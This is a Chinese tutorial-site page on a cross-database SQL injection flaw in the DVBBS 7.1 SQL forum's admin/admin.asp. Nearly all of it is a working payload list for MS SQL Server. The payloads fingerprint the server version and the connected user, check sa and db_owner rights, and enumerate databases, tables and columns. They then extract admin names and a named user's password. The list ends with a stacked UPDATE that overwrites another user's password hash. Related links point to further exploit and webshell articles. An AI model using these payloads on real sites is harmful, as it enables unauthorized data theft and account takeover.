首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >实用技巧 >漏洞研究 >DVBBS7.1 SQL版 跨库漏洞
DVBBS7.1 SQL版 跨库漏洞
摘要:漏洞测试环境:DVBBS7.1SQL受影响文件admin/admin.asp.....漏洞利用(select@@version)>0获得Wi...

漏洞测试环境:DVBBS7.1SQL

受影响文件

admin/admin.asp

.....

漏洞利用

(select@@version)>0获得Windows的版本号

anduser_name()='dbo'判断当前系统的连接用户是不是sa

(selectuser_name())>0爆当前系统的连接用户

(selectdb_name())>0得到当前连接的数据库

(selectIS_MEMBER('db_owner'))--查询数据库当前用户权限

(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=7)---查询所有数据库名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U')--查询数据库表名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U'andnamenotin('web_Admin'))--查询数据库所有表名

(selectcount(*)fromJxSoufun.dbo.sysobjectswherextype='U'andname='web_Admin'anduid>(str(id)))--查询表名ID

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048)--查询字段名

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048andnamenotin('adminname'))--查询所有字段名

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminName>1)-查询用户

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminpwd>1andusername='bluefire')-查询用户bluefire密码

;updateJxSoufun.dbo.Agency_Usersetuserpwd='965eb72c92a549dd'whereusername='mthfc';--

【DVBBS7.1 SQL版 跨库漏洞】相关文章:

蓝雨设计整站SQL注入漏洞

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

114论坛2005正式版漏洞

PJBlog存在SQL注入漏洞大家要快下补丁了

漏洞漫舞的飞骋

BBSXP漏洞再探究

BBSXP5.15跨站攻击漏洞

ETP 留言本v1.5爆出漏洞及利用方法

新思路现动网新漏洞

网站程序中非SI漏洞的利用

上一篇: 教你利用Log备份获取Webshell
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
实用技巧子分类
最新漏洞研究学习
热门漏洞研究学习